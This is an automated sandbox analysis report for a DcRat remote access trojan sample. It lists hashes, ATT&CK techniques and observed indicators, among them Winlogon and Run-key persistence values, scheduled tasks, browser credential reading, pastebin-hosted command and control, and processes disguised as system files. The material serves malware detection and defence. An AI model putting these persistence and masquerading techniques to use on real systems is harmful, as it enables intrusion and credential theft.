dcrat | b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240

Analysis

max time kernel
150s
max time network
152s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
20-11-2024 08:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

AstralprivateDLL.exe
Size

65.7MB
MD5

c9f4668c97eb480751e1bbf6173fc4e1
SHA1

528deade2bc88cafc26f78f7c73490b66abdf370
SHA256

b9f8572fc7a8a6c2230434abb7190ae860f28386b3f0d5e5ee3754c6befca240
SHA512

dd1d2499a2fca08181e43ea53138b3001d5674f2197c8962681bea188a07687feeb19b5bb8fb35e2339739e7df7b2bc2b2166bf02733bb3cf01f90571f874f41
SSDEEP

196608:27H3VIb7wjJfQqkGCaG1R8uzSJzbwHyokFpz/ehFCIUmF4tDDnYdBaUqkM9h8:s6vwmRR85JPwHyjIgIPCRnYBY

Score

10^/10

dcrat discovery evasion execution infostealer persistence rat spyware stealer

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat

Modifies WinLogon for persistence 2 TTPs 6 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

Processes:

ServerComponenthostMonitorDll.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\PolicyDefinitions\\it-IT\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, \"C:\\Users\\Default\\My Documents\\Idle.exe\", \"C:\\Recovery\\WindowsRE\\taskhostw.exe\", \"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\", \"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\", \"C:\\Windows\\PolicyDefinitions\\it-IT\\cmd.exe\", \"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe

Process spawned unexpected child process 18 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

description	pid	pid_target	process
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2132	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1096	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4516	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	536	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1116	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4572	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4036	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2936	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1808	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2640	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2540	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3124	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3652	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3192	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	3828	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4800	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	4032	3820	schtasks.exe
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	1772	3820	schtasks.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 13 IoCs

Processes:

twain_32.exeupdater.exe

description	pid	process	target process
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 1792 created 3432	1792	twain_32.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE
PID 2072 created 3432	2072	updater.exe	Explorer.EXE

Command and Scripting Interpreter: PowerShell 1 TTPs 22 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
2368	powershell.exe
5660	powershell.exe
1632	powershell.exe
2488	powershell.exe
3060	powershell.exe
640	powershell.exe
1376	powershell.exe
4768	powershell.exe
3380	powershell.exe
448	powershell.exe
1028	powershell.exe
5044	powershell.exe
3372	powershell.exe
4972	powershell.exe
5416	powershell.exe
624	powershell.exe
1540	powershell.exe
3112	powershell.exe
1328	powershell.exe
4120	powershell.exe
792	powershell.exe
756	powershell.exe

Disables Task Manager via registry modification
evasion
Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

AstralprivateDLL.exeAstral private DLL.exeWScript.exeServerComponenthostMonitorDll.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	AstralprivateDLL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	Astral private DLL.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation	ServerComponenthostMonitorDll.exe

Executes dropped EXE 5 IoCs

Processes:

Astral private DLL.exetwain_32.exeServerComponenthostMonitorDll.exeIdle.exeupdater.exe

pid process

3328 Astral private DLL.exe
1792 twain_32.exe
2848 ServerComponenthostMonitorDll.exe
5584 Idle.exe
2072 updater.exe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

pid	process
3328	Astral private DLL.exe
1792	twain_32.exe
2848	ServerComponenthostMonitorDll.exe
5584	Idle.exe
2072	updater.exe

Adds Run key to start application 2 TTPs 12 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

ServerComponenthostMonitorDll.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\PolicyDefinitions\\it-IT\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cmd = "\"C:\\Windows\\PolicyDefinitions\\it-IT\\cmd.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\taskhostw = "\"C:\\Recovery\\WindowsRE\\taskhostw.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\lsass = "\"C:\\Program Files\\dotnet\\swidtag\\lsass.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\My Documents\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Idle = "\"C:\\Users\\Default\\My Documents\\Idle.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Recovery\\WindowsRE\\RuntimeBroker.exe\""	ServerComponenthostMonitorDll.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ServerComponenthostMonitorDll = "\"C:\\containerperf\\ServerComponenthostMonitorDll.exe\""	ServerComponenthostMonitorDll.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

47 pastebin.com
48 pastebin.com

flow	ioc
47	pastebin.com
48	pastebin.com

Power Settings 1 TTPs 10 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exe

pid	process
2640	powercfg.exe
1740	powercfg.exe
5964	powercfg.exe
5528	powercfg.exe
1480	cmd.exe
384	powercfg.exe
1448	powercfg.exe
2428	powercfg.exe
3328	cmd.exe
2772	powercfg.exe

Drops file in System32 directory 8 IoCs

Processes:

csc.exesvchost.exeOfficeClickToRun.exepowershell.exepowershell.exeServerComponenthostMonitorDll.exe

description	ioc	process
File created	\??\c:\Windows\System32\CSC2F91EB39BFA94C38A1D1E6B7EB73E714.TMP	csc.exe
File created	\??\c:\Windows\System32\s_kgxh.exe	csc.exe
File opened for modification	C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\System32\SecureBootUpdates\System.exe	ServerComponenthostMonitorDll.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

twain_32.exeupdater.exe

description	pid	process	target process
PID 1792 set thread context of 3192	1792	twain_32.exe	dialer.exe
PID 2072 set thread context of 552	2072	updater.exe	dialer.exe
PID 2072 set thread context of 5412	2072	updater.exe	dialer.exe
PID 2072 set thread context of 3832	2072	updater.exe	dialer.exe

Drops file in Program Files directory 4 IoCs

Processes:

ServerComponenthostMonitorDll.exetwain_32.exeupdater.exe

description	ioc	process
File created	C:\Program Files\dotnet\swidtag\lsass.exe	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\dotnet\swidtag\6203df4a6bafc7	ServerComponenthostMonitorDll.exe
File created	C:\Program Files\Google\Chrome\updater.exe	twain_32.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 5 IoCs

Processes:

ServerComponenthostMonitorDll.exesvchost.exe

description	ioc	process
File created	C:\Windows\PolicyDefinitions\it-IT\cmd.exe	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\PolicyDefinitions\it-IT\cmd.exe	ServerComponenthostMonitorDll.exe
File created	C:\Windows\PolicyDefinitions\it-IT\ebf1f9fa8afd6d	ServerComponenthostMonitorDll.exe
File created	C:\Windows\OCR\en-us\TrustedInstaller.exe	ServerComponenthostMonitorDll.exe
File opened for modification	C:\Windows\SoftwareDistribution\DataStore\Logs\edb.chk	svchost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

1808 sc.exe
3372 sc.exe
3980 sc.exe
3708 sc.exe
536 sc.exe
4928 sc.exe
2208 sc.exe
2504 sc.exe
5516 sc.exe
3568 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

pid	process
1808	sc.exe
3372	sc.exe
3980	sc.exe
3708	sc.exe
536	sc.exe
4928	sc.exe
2208	sc.exe
2504	sc.exe
5516	sc.exe
3568	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

reg.exeAstralprivateDLL.exeAstral private DLL.exeWScript.execmd.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	reg.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AstralprivateDLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Astral private DLL.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exepowershell.exeOfficeClickToRun.exedialer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1732090916"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={292BA0D8-71DC-48A3-8D26-A83ACA9C9665}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\ROOT	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe

Modifies registry class 2 IoCs

Processes:

ServerComponenthostMonitorDll.exeAstral private DLL.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	ServerComponenthostMonitorDll.exe
Key created	\REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000_Classes\Local Settings	Astral private DLL.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

428 reg.exe

pid	process
428	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 18 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

pid	process
536	schtasks.exe
4572	schtasks.exe
2936	schtasks.exe
1808	schtasks.exe
2540	schtasks.exe
3124	schtasks.exe
3828	schtasks.exe
2132	schtasks.exe
1116	schtasks.exe
3652	schtasks.exe
4032	schtasks.exe
1772	schtasks.exe
1096	schtasks.exe
4516	schtasks.exe
4036	schtasks.exe
2640	schtasks.exe
3192	schtasks.exe
4800	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

ServerComponenthostMonitorDll.exe

pid	process
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe
2848	ServerComponenthostMonitorDll.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

ServerComponenthostMonitorDll.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeIdle.exepowershell.exedialer.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exesvchost.exe

description	pid	process
Token: SeDebugPrivilege	2848	ServerComponenthostMonitorDll.exe
